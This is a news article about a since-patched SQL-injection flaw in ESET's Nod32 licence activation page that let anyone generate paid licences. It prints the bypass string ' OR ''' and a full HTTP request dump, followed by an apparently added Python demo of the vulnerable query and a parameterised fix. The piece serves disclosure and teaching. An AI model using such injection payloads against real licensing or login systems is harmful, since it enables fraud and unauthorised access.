Security Researcher discovers Vulnerability in ESET Nod32 Antivirus License authentication system which generates free license (username and password)

With so many worms and trojans out in the open, every computer user wants an antivirus on board their PC, and it would be even nicer to have the paid version of one for free. No, this is not a giveaway: a researcher has discovered a serious vulnerability in the licensing system of the paid ESET Nod32 version that allows hackers to use it for a full year without paying.

Security researcher Mohamed Abdelbaset Elnoby has discovered a vulnerability in the authentication of the ESET Nod32 licensed version that allows potential hackers to generate millions of usernames and passwords without a hitch.

Elnoby has dubbed the authentication bug “hilarious”, and he states: “Hilarious Broken Authentication bug I found in ESET website specifically in their “Antivirus Product Activation Process” that allowed me to generate millions of valid paid Licenses of “ESET Nod32 Antivirus” as per their description “Our award-winning security software offers the most effective protection available today” for free.”

The ability to generate unlimited usernames and passwords for ESET Nod32 is caused by a broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method provides adequate security. Negligence, ignorance, or simple underestimation of security threats often results in authentication schemes that can be bypassed by skipping the login page and directly calling an internal page that is supposed to be reachable only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication, such as:

  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection

The PoC of the bug is given below:

[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: https://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:

POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--

Each time a potential hacker submitted the above authentication bypass string, he or she could generate a paid ESET Nod32 license valid for one year, which normally costs $29.00, per request. ESET has acknowledged the vulnerability and has now patched the website. It also awarded Elnoby a bug bounty of one year's free licence for his efforts. The bug may not be that hilarious, but the bounty awarded to him sure seems “hilarious”, because Elnoby must have saved ESET quite a fortune.
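The article does not show ESET's server-side query, so the following is an added illustration rather than ESET's code: it assumes a hypothetical licence lookup that splices the submitted product key into a SQL LIKE pattern, shows why the PoC string ' OR ''' then matches every row, and puts the hardened form (key-format validation plus a bound parameter) beside it. Table contents and key format are constructed for the example.

```python
import re
import sqlite3

# Constructed sample licence table (not real ESET data).
SAMPLE_LICENSES = [
    ("AAAA-BBBB-CCCC-DDDD", "user1"),
    ("EEEE-FFFF-GGGG-HHHH", "user2"),
]

# Bypass string exactly as it appears in the PoC request body.
BYPASS_PAYLOAD = "' OR '''"

# Assumed (hypothetical) key format: four dash-separated groups of four.
KEY_PATTERN = re.compile(r"^[A-Z0-9]{4}(-[A-Z0-9]{4}){3}$")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE licenses (serial TEXT PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO licenses VALUES (?, ?)", SAMPLE_LICENSES)
    return conn


def lookup_vulnerable(conn, serial):
    # Hypothetical vulnerable form: the key is concatenated into the query.
    # With the PoC string the WHERE clause becomes
    #     serial LIKE '%' OR '''%'
    # where '''%' is just the literal string '% and LIKE '%' is true for
    # every row, so an activation step that accepts "any row came back"
    # hands out a licence for every request.
    sql = "SELECT username FROM licenses WHERE serial LIKE '%" + serial + "%'"
    return [row[0] for row in conn.execute(sql)]


def lookup_hardened(conn, serial):
    # Reject anything that is not a well-formed key before it reaches the
    # database; the PoC string fails this check outright.
    if not KEY_PATTERN.match(serial):
        return []
    # Bind the key as a parameter so its characters can never change the
    # structure of the query, and require an exact match rather than LIKE.
    rows = conn.execute("SELECT username FROM licenses WHERE serial = ?", (serial,))
    return [row[0] for row in rows]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, BYPASS_PAYLOAD))
    print("hardened:  ", lookup_hardened(db, BYPASS_PAYLOAD))
```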

The video of the PoC is given below:

Source: Egyptian Geeks.
